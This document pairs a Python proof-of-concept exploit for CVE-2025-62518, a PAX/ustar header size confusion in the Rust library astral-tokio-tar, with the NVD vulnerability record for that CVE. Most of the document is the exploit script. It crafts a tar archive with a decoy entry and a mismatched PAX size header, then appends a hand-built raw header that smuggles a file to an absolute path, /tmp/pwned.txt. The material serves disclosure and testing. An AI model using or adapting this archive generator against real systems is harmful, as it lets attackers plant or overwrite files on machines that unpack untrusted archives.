CVE-2025-62518

# CVE-2025-62518 PoC - Tarmageddon: astral-tokio-tar PAX Header Smuggling # This PoC demonstrates how to craft a malicious tar archive that exploits # the inconsistent PAX/ustar header size handling in astral-tokio-tar < 0.5.6 import tarfile import io import os def create_malicious_tar(output_path, smuggled_filename, smuggled_content): """ Create a tar archive that exploits CVE-2025-62518 by smuggling an additional archive entry through PAX header size confusion. """ buf = io.BytesIO() # First entry: legitimate-looking file with PAX extended header # The PAX header specifies a large size, but ustar header has size=0 pax_info = {"size": str(len(smuggled_content) + 512)} with tarfile.open(fileobj=buf, mode='w') as tar: # Add a normal file entry info = tarfile.TarInfo(name="innocent.txt") info.size = len(b"This is a decoy file content.") tar.addfile(info, io.BytesIO(b"This is a decoy file content.")) # Add PAX header entry with manipulated size info2 = tarfile.TarInfo(name="exploit.txt") info2.size = 0 # ustar header says 0, but PAX will say otherwise info2.pax_headers = pax_info tar.addfile(info2) # Manually craft the malicious tar with embedded smuggled entry with open(output_path, 'wb') as f: f.write(buf.getvalue()) # Append the smuggled tar entry (will be misinterpreted as a header) smuggled_entry = create_raw_tar_entry(smuggled_filename, smuggled_content) f.write(smuggled_entry) print(f"Malicious tar created: {output_path}") def create_raw_tar_entry(filename, content): """Create a raw tar entry that will be smuggled via the size confusion.""" header = bytearray(512) # Filename (first 100 bytes) fname_bytes = filename.encode('utf-8') header[0:len(fname_bytes)] = fname_bytes # File mode (bytes 100-107): "0000644\0" header[100:108] = b"0000644\x00" # UID (bytes 108-115): "0000000\0" header[108:116] = b"0000000\x00" # GID (bytes 116-123): "0000000\0" header[116:124] = b"0000000\x00" # File size (bytes 124-135): octal of content length size_str = f"{len(content):011o}\x00".encode('ascii') header[124:136] = size_str # Modification time (bytes 136-147): "00000000000\0" header[136:148] = b"00000000000\x00" # Checksum placeholder (bytes 148-155): spaces for calculation header[148:156] = b" " # Type flag (byte 156): '0' = regular file header[156] = ord('0') # Magic (bytes 257-262): "ustar\0" header[257:263] = b"ustar\x00" # Version (bytes 263-264): "00" header[263:265] = b"00" # Calculate checksum checksum = sum(header) & 0xFFFFFF chk_str = f"{checksum:06o}\x00 ".encode('ascii') header[148:156] = chk_str # Pad content to 512-byte boundary padded_content = content + b'\x00' * ((512 - len(content) % 512) % 512) return bytes(header) + padded_content # Usage example if __name__ == "__main__": # Attempt to smuggle a file to /tmp/pwned.txt create_malicious_tar( "exploit.tar", "/tmp/pwned.txt", b"This file was smuggled via CVE-2025-62518!" )

{"cve": {"id": "CVE-2025-62518", "sourceIdentifier": "[email protected]", "published": "2025-10-21T17:15:40.563", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "astral-tokio-tar is a tar archive reading/writing library for async Rust. Versions of astral-tokio-tar prior to 0.5.6 contain a boundary parsing vulnerability that allows attackers to smuggle additional archive entries by exploiting inconsistent PAX/ustar header handling. When processing archives with PAX-extended headers containing size overrides, the parser incorrectly advances stream position based on ustar header size (often zero) instead of the PAX-specified size, causing it to interpret file content as legitimate tar headers. This issue has been patched in version 0.5.6. There are no workarounds."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-843"}]}], "references": [{"url": "https://edera.dev/stories/tarmageddon", "source": "[email protected]"}, {"url": "https://github.com/astral-sh/tokio-tar/commit/22b3f884adb7a2adf1d3a8d03469533f5cbc8318", "source": "[email protected]"}, {"url": "https://github.com/astral-sh/tokio-tar/security/advisories/GHSA-j5gw-2vrg-8fgx", "source": "[email protected]"}, {"url": "https://github.com/astral-sh/uv/security/advisories/GHSA-w476-p2h3-79g9", "source": "[email protected]"}, {"url": "https://github.com/edera-dev/cve-tarmageddon", "source": "[email protected]"}]}}